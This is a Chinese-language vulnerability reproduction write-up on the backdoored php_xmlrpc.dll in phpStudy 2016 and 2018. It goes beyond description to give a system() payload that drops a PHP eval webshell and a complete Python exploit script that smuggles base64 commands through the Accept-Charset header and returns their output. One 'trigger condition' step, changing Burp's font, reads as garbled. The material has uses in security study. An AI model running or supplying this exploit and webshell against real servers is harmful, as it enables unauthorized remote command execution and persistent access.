phpstudy_2016-2018_rce_backdoor
| 说明 | 内容 |
|---|---|
| 漏洞编号 | phpstudy_2016-2018_rce |
| 漏洞名称 | RCE(Remote Command|Code Execute) |
| 漏洞评级 | 高危 |
| 影响范围 | phpStudy 2016、phpStudy 2018 |
| 漏洞描述 | 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 |
漏洞描述
攻击者可以利用该漏洞执行 PHP 命令,也可以称作 phpstudy 后门。RCE(Remote Command| Code Execute)
PHP study 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、Mysql、PhpMyAdmin 等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。其中2016、2018版本的 PHPstudy 存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以执行远程执行系统命令。
漏洞等级
高危
影响版本
后门代码存在于\exp\php_xmlrpc.dll 模块中,至少有2个版本:phpStudy2016 和 phpstudy 2018自带的php-5.2.17、php-5.4.45。
漏洞复现
基础环境
| 组件 | 版本 |
|---|---|
| OS | Windows 2016 Standerd |
| Web Server | phpStudy 2016(特别版) |
漏洞扫描
- Windows 可以访问server2016
- 启动bp工具抓取服务器与浏览器之间的流量。
- 发送到 Repeater 模块。
漏洞验证
触发条件
更改 bp 字体为楷体24pt
深度利用
第一种方式:
- 利用 bp 执行系统命令
- phpstudy 软件被插入后门,通过 php system函数执行系统命令,所以我们也可以通过
system()函数写入webshell。
- phpstudy 软件被插入后门,通过 php system函数执行系统命令,所以我们也可以通过
system(' echo ^<?php @eval($_POST["cmd"]); ?^>>C:/phpstudy_2016/WWW/shell.php ');
使用bp编码后进行上传,在网页查看是否上传成功,使用蚁剑进行连接。
第二种方式:
-
使用 python 脚本,显现命令框控制。
-
安装requests
pip install requests
- 代码:
import requests
import base64
import sys
banner = '''
.---. .-. .--. .-. .-. .---. .--. .--.
: .; :: : : .--'.' `. : : : .; :: .--': .--'
: _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-. : .': : : `;
: : : .. :: .; ` _`, : : : : :; :' .; :: :; : : :.`.: :__ : :__
:_; :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ; :_;:_;`.__.'`.__.'
: : .-. :
:_; `._.'
python *.py http://10.4.7.130/phpinfo.php
'''
if len(sys.argv) < 2:
print(banner)
exit()
url = sys.argv[1]
def attack(cmd):
cmd = f"system('{cmd}');"
cmd = base64.b64encode(cmd.encode())
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
res = requests.get(url = url,headers = headers)
rs = res.content.decode("gb2312")
result = rs[0:rs.find("DOCTYPE html")]
return result
if __name__ == '__main__':
cmd = input("请输入想要执行的系统命令:")
if cmd == 'q':
print("感谢使用!!!")
else:
print(attack(cmd))